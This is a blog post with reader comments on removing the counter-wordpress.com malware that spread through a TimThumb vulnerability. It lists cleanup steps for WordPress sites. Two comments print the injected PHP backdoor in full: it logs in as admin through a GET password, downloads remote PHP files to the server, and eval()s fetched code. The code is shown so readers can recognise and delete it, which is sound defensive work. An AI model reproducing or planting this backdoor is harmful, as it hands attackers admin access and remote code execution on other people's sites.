Delete malware warning counter-wordpress.com

There is a leak in old versions of TimThumb, read the article about it here. This week (started on august 22) many WordPress (with TimThumb) users encountered problems with there websites. Google marked there websites as a risk (including one of my websites).

The websites connected to counter-wordpress.com. The script/malware had the abbility to enter your database, create a database dump, play sounds (?), get your WordPress password and more.. With the curl_setopt function there were able to install php scripts on your server.
So for those who have problems, a quick guide to fix this. And for those who doesn’t have problems yet. Update TimThumb (latest version here)!

Fix this malware warning step by step:

  • Remove code from your wp-config.php or upload a clean version.
    • Inspect your wp-confip.php. They add like 3000 of empty Lines. Somewhere in the middle there is the malicious code. Delete it!
  • Delete the files the injected with the curl_setopt function:
    • wp-admin/upd.php
    • wp-content/upd.php
  • Some WordPress users (I didn’t) found a ‘temp’ folder in there current theme folder with a file like eab9c5e9815adc4c40a6557495eed6d3.php, or something like that. Delete it.
  • Update your WordPress if possible!
  • Replace the following file with original files from a clean WordPress installation:
    • wp-settings.php
    • wp-includes/js/jquery/jquery.js
    • wp-includes/js /l10n.js
    • * If you have problems overwriting them, delete them first (on your FTP) and then upload the new file
  • Replace timthumb with the latest version
  • Change your FTP password
  • Change your DB password and change it in wp-config.php
  • If Google is warning your visitors (right above the result description in the SERP). Login to webmastertools and ask for a review. It should be gone in 24 hours
  • To be sure check your website with these tools:
  • You’re done!

Hopefully your site will be clean after your followed the steps above. Did you found other suspisious thing please let me know by writing a comment.

61 thoughts on “Delete malware warning counter-wordpress.com

  1. Great, first one to comment. Your blog came in the right time as this issue with my website just happened this morning. I did all the steps you have given me. Im just waiting for the review from webmaster tools. I hope it will work. Big thanks for this

    • Thanks Willian, thats good to know. When you like to update WordPress you could enable it again, because it needs the curl function.

  2. This was in my wp-config I deleted it:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'xxxxxxxxxxxxxxxxxxxxxxxxxxx'){
    if ($_GET['pingnow']== 'login'){
    $user_login = 'admin';
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).'.php';
    $fp = fopen($fnm, "w");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo "location.href='$fnm';";
    }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}
  3. Thanks for your post!

    My problem was also one line in the header:

    I added: wp_deregister_script(‘l10n’); in my Themes’ function.php and I got rid off the Google-warnings…

    • Your welcome! Well just removing the l10n from the header isn’t the best solution. Download a fresh copy of wordpress and replace the file in wp-includes/js /l10n.js. Good luck!

      • I know it’s not the best way to do it, but a fresh l10n.js didn’t help in my situation. Maybe the reason is that the Google warning message is not about my site but about an invisible link to “counter-wordpress” (I don’t know where or why this link is comming from). At least my system is working, and also seem to download faster…

  4. Hi,
    Thanks for this useful information!
    Since I’ve installed the WEBphysiology portfolio software, I was infected with the malware code.
    I found the extra lines in my wp_config file and I’ve removed it. In fact I’ve followed exactly your steps.
    Although it looks like my site is clean, I still get the warning message when logging in.
    I’ve checked my webmaster dashboard, but it says there is no malware found…
    Any idea how to solve this problem? And how can I figure out if I am really clean?

    Thanks for your useful help so far!

  5. Hello William and thank you for the insights. Both my websites got hit with the malware. One has been blocked by google: http://www.fotografomatrimonioroma.it
    I followed your clear and precise instructions up to: replace the following file with original files from a clean WordPress installation:
    wp-settings.php
    wp-includes/js/jquery/jquery.js
    wp-includes/js /l10n.js
    When I tried to substitute the files from a previous clean wordpress backup the website went down missing info in different lines. When I inspected the p.e. wp-settings.php files they vary in other content other than the maleware code. So I wasn’t able to fully recuperate the situation: when I run the scuri scanner it still tells me that the site is javascript infected. I also ran the scuri WP check and it tells that the site is ok. Do you think I am ok like this or is there something I can do to fix the corrupted javascript? Many thanks for your help

  6. Geezz… so many things to do. O_O Thanks for the step by step. I thought it’s just in my theme. But when I view the source, I fonder nothing about the counter-wordpress.com domain. I’m soooo dooomed if I haven’t read this post! Thanks again!

  7. I have recently got this problem –

    for some reason I cannot delete/overwrite my wp-config.php It had the huge gap and the code half way down – just as you had described. I downloaded it from my ftp and altered it. I then uploaded the new/clean version and put it back into the same folder. I then renamed the old corrupt config file and moved it, hoping it wont be read at all.

    I also have this file as you described ed59d62e1b1e2167275feed65b374079.php

    But I cannot find it anywhere on my ftp to delete – any ideas where I can find this thing?

    • Thanks for pointing out the overwrite problem, had the same thing, I will putt a note in my post so other people know.

      Do you mean you can’t find the ed59d62e1b1e2167275feed65b374079.php (or something like that) file on your server?

      I didn’t had that file either, but some other users had. So if you can’t find it don’t worry, I think it was never there.

      • I contacted the support team that supplied me with the theme. They knew all about this error. It was something that involved Timthumb script – it was vulnerable.

        They uploaded a newer version of the theme which appears to have solved the error messages. The new theme does not support timthumb script either. Touch wood I wont have a repeat of such matters. Thanks for you help on this. Anybody reading this just try updating to the newest version of your blog theme, and delete any that your not using.

  8. Hi,
    Just an update about the status of my malware warning screen.
    It seems all my problems are solved!

    As described in my previous reply, I sill got the malware warning after login to the admin.
    Today I finally fixed this issue! It seems like the warning is caused by the plugin google-analytics-dashboard. Since I’ve removed that plugin, instantly the warning is gone.
    So the beware, there could be something wrong with this plugin.

    • Thanks for your update! That’s pretty strange. Didn’t you find any strange files in the google-analytics-dashboard folder?

  9. Pingback: counter-wordpress.com Uyarısı ve Çözümü | İnternet Durağı

  10. I followed these steps. I found the site to be clean upon following. I have even changed the data base user passwords. But the problem seems to be never ending. The malware is coming back again and again. The problem is with these two files, I10n.js and Jquery.js.

    I have some 3 to 4 wordpress installations on my hosting account. All of them are having same problem.

    How can I solve the issue? Thanks in advance.

    • Did you really followed all the steps? Also overwritten the files l10n.js and jquery.js with clean files? Updated timthumb.php?
      If you need help send me an e-mail at info[at]reinaris.nl

      • Hi Rein,

        I didn’t update the timthumb.php files! I did it now. Hope this fixes everything. What about the timthumb.txt which I found in some of the cache folders when I searched? Do I have to delete them?

        Thanks a lot for the help! :)

          • The problem is back! :( Jquery.js and I10n.js got infected again.

            I updated timthumb.php on all the wordpress installations. Followed all other steps as you told, but still the issue is back..!

            Can you help me in resolving this issue

            • If you really did al steps I mentioned above (like removing the upd.php files etc) and you still have problems I can help you out. Send me an email (info[at]reinaris.nl) with FTP/WP-Admin details and i will take a look.

              But please try it yourself by following al the steps in the post above curefully.

              • Hi, I have done all the things you said except these.

                I didn’t find upd.php files any where in the directories you mentioned.

                I don’t have an FTP account. I installed it through the fantastico deluxe. So do I have to change the cPanel login also? I already changed the DB passwords and updated it in config file.

                I am hopeless of getting rid of it. I set the permissions of the two files I10n.js and jquery.js to 444 revoking writing rights even for the admin, and hope it will work.

                So far the site is good. The malware infection is happening exactly once in a day..

                If the problem persists, I will definitely mail you and seek your help. Thanks a lot for being so kind.

                • No you don’t have to change your cpanel pass. If you still encounter problems, create an ftp account and contact me :) I hope your website will be malware-free!!

  11. Pingback: Malware Attack! | Oddly Enough

  12. Pingback: Mein Blog hats erwischt: Warnung Malware gefunden – counter-wordpress.com « Fene-Blog

  13. Hi,

    Thanks you for the great tutorial.

    I have a problem with this step – ‘Change your DB password and change it in wp-config.php’

    Where do I change the database password?

    Thanks!

  14. 1 question:
    “upd.php” = “upgrade.php” ???

    I didn’t find upd.php files any where in the directories just “upgrade.php”….

    i need delete this:
    wp-admin/upgrade.php
    wp-content/upgrade.php

    ???

    tks!

    • Please take a look at the file. If it looks something like this:

      if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
      if ($_GET['pass'] == 'xxxxxxxxxxxxxxxxxxxxxxxxxxx'){
      if ($_GET['pingnow']== 'login'){
      $user_login = 'admin';
      $user = get_userdatabylogin($user_login);
      $user_id = $user->ID;
      wp_set_current_user($user_id, $user_login);
      wp_set_auth_cookie($user_id);
      do_action('wp_login', $user_login);
      }
      if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
      $ch = curl_init($_GET['file']);
      $fnm = md5(rand(0,100)).'.php';
      $fp = fopen($fnm, "w");
      curl_setopt($ch, CURLOPT_FILE, $fp);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      curl_exec($ch);
      curl_close($ch);
      fclose($fp);
      echo "location.href='$fnm';";
      }
      if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
      $ch = curl_init($_GET['file']);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      $re = curl_exec($ch);
      curl_close($ch);
      eval($re);
      }}}

      Than it’s the malware. Delete it!

      I read the ‘malware people’ are changing theyre filenames…

  15. Thanks for this awesome post. I fixed the virus a few months ago but I didn’t realize that it left some remnants of its ill coding in some of my WordPress files. I think I finally got my site cleaned now!

  16. I have a website (wordpress / magento) infected by this malware.
    When I look at the wp-config.php the informations about database connection are not the good ones. And my database is empty.
    As anyone already get the case ?

  17. Pingback: Script installation service

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>